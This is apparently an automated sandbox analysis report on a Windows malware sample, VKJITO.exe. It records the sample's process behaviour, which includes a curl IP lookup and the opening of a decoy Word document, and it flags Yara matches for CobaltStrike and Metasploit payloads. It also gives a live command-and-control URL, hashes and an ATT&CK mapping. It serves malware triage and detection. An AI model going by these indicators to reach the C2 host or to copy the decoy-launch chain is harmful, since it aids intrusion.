        Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
        Source: curl.exe, 00000001.00000003.1363378838.00000138A0744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
        Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5DA9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73A5DA9C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CBCB0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,ReleaseMutex,0_2_00007FF73A5CBCB0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5A1850 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF73A5A1850
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5DAB64 SetUnhandledExceptionFilter,0_2_00007FF73A5DAB64
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5DA9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73A5DA9C0
        Source: C:\Users\user\Desktop\VKJITO.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sbJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docxJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""Jump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C2940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF73A5C2940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5DA89C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF73A5DA89C
        Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

        Remote Access Functionality

        barindex
        Yara detected CobaltStrike
        Source: Yara matchFile source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Yara detected Metasploit Payload
        Source: Yara matchFile source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		12
        Process Injection        		2
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Disable or Modify Tools        		LSASS Memory31
        Security Software Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Extra Window Memory Injection        		12
        Process Injection        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information        		LSA Secrets3
        System Information Discovery        		SSHKeylogging112
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Extra Window Memory Injection        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577651 Sample: VKJITO.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 88 27 time.windows.com 2->27 29 templatesmetadata.office.net 2->29 31 3 other IPs or domains 2->31 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 4 other signatures 2->45 8 VKJITO.exe 7 2->8         started        signatures3 process4 dnsIp5 33 139.159.139.109, 49705, 8080 HWCSNETHuaweiCloudServicedatacenterCN China 8->33 11 WerFault.exe 19 16 8->11         started        14 curl.exe 1 8->14         started        17 cmd.exe 4 2 8->17         started        process6 dnsIp7 25 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->25 dropped 35 ip.sb 104.26.13.31, 49703, 80 CLOUDFLARENETUS United States 14->35 37 127.0.0.1 unknown unknown 14->37 19 conhost.exe 14->19         started        21 WINWORD.EXE 191 461 17->21         started        23 conhost.exe 17->23         started        file8 process9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        VKJITO.exe42%ReversingLabsWin64.Trojan.Iphellsgate

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://139.159.139.109:8080/uz68ug0%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz68d(0%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz68dg0%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz68x(0%Avira URL Cloudsafe
        http://39.159.139.109:8080/uz680%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz68ig0%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz680%Avira URL Cloudsafe
        http://139.159.139.109/uz680%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
        		212.229.88.4
        		truefalse
          		high
          ip.sb
          		104.26.13.31
          		truefalse
            		high
            time.windows.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://139.159.139.109/uz68true
              • Avira URL Cloud: safe
              		unknown
              http://39.159.139.109:8080/uz68true
              • Avira URL Cloud: safe
              		unknown
              http://139.159.139.109:8080/uz68true
              • Avira URL Cloud: safe
              		unknown
              http://ip.sb/false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://139.159.139.109:8080/uz68dgVKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://139.159.139.109:8080/uz68d(VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://upx.sf.netAmcache.hve.12.drfalse
                  		high
                  http://ip.sb/edNameSpaceh51curl.exe, 00000001.00000002.1364350016.00000138A0739000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://139.159.139.109:8080/uz68igVKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://139.159.139.109:8080/uz68x(VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://139.159.139.109:8080/uz68ugVKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.26.13.31
                    		ip.sbUnited States
                    		13335CLOUDFLARENETUSfalse
                    139.159.139.109
                    		unknownChina
                    		55990HWCSNETHuaweiCloudServicedatacenterCNtrue

                    Private

                    IP
                    127.0.0.1

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1577651
                    Start date and time:2024-12-18 16:29:03 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:VKJITO.exe
                    Detection:MAL
                    Classification:mal88.troj.winEXE@12/239@3/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 94%
                    • Number of executed functions: 21
                    • Number of non-executed functions: 90
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 20.101.57.9, 40.81.94.65, 52.109.28.46, 52.109.89.19, 52.113.194.132, 2.16.229.162, 212.229.88.4, 52.111.236.33, 52.111.236.32, 52.111.236.34, 52.111.236.35, 23.218.208.109, 20.42.72.131, 2.17.100.210, 2.17.100.200, 104.86.110.75, 104.86.110.74, 13.107.246.63, 20.190.159.23, 172.202.163.200, 20.42.73.29
                    • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, twc.trafficmanager.net, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: VKJITO.exe

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.26.13.31PM7K6PbAf0.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, StealcBrowse
                      http://lapersianeria.com/mot/a2FyZW5fdmFuX291dHJ5dmVAZmQub3JnGet hashmaliciousUnknownBrowse
                        https://bityl.co/Rdhj#MmpKcFFEVVI2TVllaWsyVHoxbTVjNVQ2OFJkV0I2UW53emdGdFlabWtLYlFDd3ZmMjIydmh0VVc3SEJnZUNkeG11THhoRWM4cS95OXhmejFJQXRJWlE9PQ__Get hashmaliciousPhisherBrowse
                          https://www.houseofmimee.comGet hashmaliciousUnknownBrowse
                            Fd_HR24 Jul, 2024.pdfGet hashmaliciousPhisherBrowse
                              qsQ89pyTBf.exeGet hashmaliciousGlupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                UEMDMCdwip.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                  uuX52kMNkj.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                    3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exeGet hashmaliciousAmadey, Healer AV Disabler, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                      HWl7Kb2oh2.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comGV7DzNoqCI.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.58.100
                                        99awhy8l.exeGet hashmaliciousLummaCBrowse
                                        • 217.20.58.100
                                        LA0gY3d103.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                        • 217.20.48.24
                                        YcxjdYUKIb.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                        • 217.20.58.98
                                        LA0gY3d103.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                        • 217.20.58.100
                                        YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.58.99
                                        #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                        • 217.20.58.100
                                        PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.58.100
                                        http://ngfreemessage-verifying.freewebhostmost.com/Get hashmaliciousHTMLPhisherBrowse
                                        • 217.20.58.99
                                        uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                        • 212.229.88.13

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUShttps://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445Get hashmaliciousKnowBe4Browse
                                        • 104.17.247.203
                                        0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 104.21.67.152
                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                        • 104.21.12.88
                                        0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                        • 172.67.179.109
                                        Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.64.80
                                        iOnDpwrkWY.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.197.170
                                        Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                        • 172.67.179.109
                                        random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                        • 104.21.12.88
                                        ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.66.86
                                        HWCSNETHuaweiCloudServicedatacenterCNjew.mips.elfGet hashmaliciousUnknownBrowse
                                        • 124.70.20.249
                                        arm7.elfGet hashmaliciousUnknownBrowse
                                        • 121.37.152.93
                                        IGz.mips.elfGet hashmaliciousMiraiBrowse
                                        • 121.37.118.203
                                        TRC.spc.elfGet hashmaliciousMiraiBrowse
                                        • 121.36.194.254
                                        SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                        • 124.71.162.21
                                        x86_64.elfGet hashmaliciousMiraiBrowse
                                        • 139.9.27.90
                                        rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 124.71.180.2
                                        la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                        • 124.71.98.237
                                        jew.ppc.elfGet hashmaliciousUnknownBrowse
                                        • 121.37.118.213

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):118
                                        Entropy (8bit):3.5700810731231707
                                        Encrypted:false
                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                        MD5:573220372DA4ED487441611079B623CD
                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VKJITO.exe_3462f5c2d36aa74735a8f1181fb306c587498df_bbfc0d35_a0766ff5-7b61-4403-960d-27c8e1a41efa\Report.wer

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9003219075659693
                                        Encrypted:false
                                        SSDEEP:96:K2FMvxIi8PswAioh7JfSQXIDcQWc6zcEZcw37dqe+HbHg/KownOg3FxTYbATFwdj:l8f8PK0I3D8jovNzuiFhZ24lO8m
                                        MD5:B6857EB44385EA09A6BF34E40755BF45
                                        SHA1:F3E8B9D5F3C618883272C03257FB773EE0076A9D
                                        SHA-256:2E7CE201899A6B7182672A9244C97FBB49FDCF36491B6FE264C82B8391E8D78C
                                        SHA-512:3BF6AA7B8E19B8810A3A23F18031864CE7466581FACA42CD70067DD6D99F2F279D58E206712AB11FE8EAE127A7536B092B03D307395474675AD45852E9B3510B
                                        Malicious:true
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.9.4.1.6.7.0.6.8.1.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.9.4.1.7.5.3.4.9.2.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.7.6.6.f.f.5.-.7.b.6.1.-.4.4.0.3.-.9.6.0.d.-.2.7.c.8.e.1.a.4.1.e.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.b.9.9.c.5.d.-.1.b.9.a.-.4.8.3.c.-.8.f.4.a.-.d.c.8.f.5.c.7.5.d.4.4.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.V.K.J.I.T.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.4.-.0.0.0.1.-.0.0.1.4.-.5.b.6.f.-.e.5.b.7.6.1.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.2.0.8.1.7.2.3.0.4.2.3.4.b.c.4.2.2.a.7.d.f.4.5.b.9.1.3.f.a.9.e.0.0.0.0.0.0.0.0.!.0.0.0.0.a.e.4.3.a.1.0.d.4.6.2.f.0.9.a.a.7.b.9.4.5.b.5.b.3.7.a.a.d.9.c.0.d.1.d.f.4.b.0.1.!.V.K.J.I.T.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.1.7.:.0.4.:.5.2.:.0.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 15:30:17 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):144158
                                        Entropy (8bit):1.3624641038153098
                                        Encrypted:false
                                        SSDEEP:768:1MUSmVKdy96i+e5Y4ppkWQuE5YFvs5gaTAAxfI/xcppAD5af:1M/WQuE5YFvsh0AxfI/xcpKD5af
                                        MD5:8ED45104A36FD2597C331128DFBAF003
                                        SHA1:FDB00517A725AF79894D3EE4510AF35AAC7CDB6A
                                        SHA-256:91FC15E429689B7E60CE64A0EBA5E9D604686D93C89C8C634FF17F54569C7815
                                        SHA-512:60A515AE24C0925B5817C64E89625A7AAFE84C10EB5C98D65D3B2D1550B2DACBE05B2EEE3A63B7D3649D0E2523762121EB63D63512EEC8D3729E3CA7A1350719
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, Author: unknown
                                        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, Author: unknown
                                        Preview:MDMP..a..... .........bg....................................$....W..........`.......8...........T...........8-......................................8...............................................................................eJ......H.......Lw......................T.............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB870.tmp.WERInternalMetadata.xml

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8758
                                        Entropy (8bit):3.708480743769043
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJIge66YNjaoihgmfmjpDl89bdJzhf0Ffm:R6lXJnj6YZaoihgmfmUdNhfp
                                        MD5:78909B369A53E736A6273D6D99A24C46
                                        SHA1:7236ADE77C93E15F27B7FAF11D6807938A632832
                                        SHA-256:E3BA956E62C7D72D0C07D4A37F1A4481146CCFBBAB4CCBDB2C07FB9D1F2D0A26
                                        SHA-512:70BECD008ADA2979FF86CF4FE780E64A69D22E3459146BD862F0D49FD84E4C0F19F634DF0816DA48BEB150B40CECF914049F5AE741000160649232BBE69025A5
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.8.0.<./.P.i.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8B0.tmp.xml

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4661
                                        Entropy (8bit):4.492127542740119
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs0NJg771I9YuyWpW8VYoYm8M4J+diOKFMhyq859AvOxt25CTz39d:uIjf4I7zK7VkJNwhJKk+z39d
                                        MD5:358A99D9B45BB9C681BF2F483C36CDD2
                                        SHA1:F90F4E4CCF333943D97BEACED30D0F75B96EEE32
                                        SHA-256:3C628975EEFE231169ECCA762920DDD2AB035AD5A80A9556B718EA0BDBC6E326
                                        SHA-512:398E13E9BEB9F0A421E2F6570257244BC13164685877C0F9DFB1C1F350BA0E62C65BF86C1D5B85AD08B3130E7AFFCEB1A21DD8626FF44894132A2AA599CD84B1
                                        Malicious:false
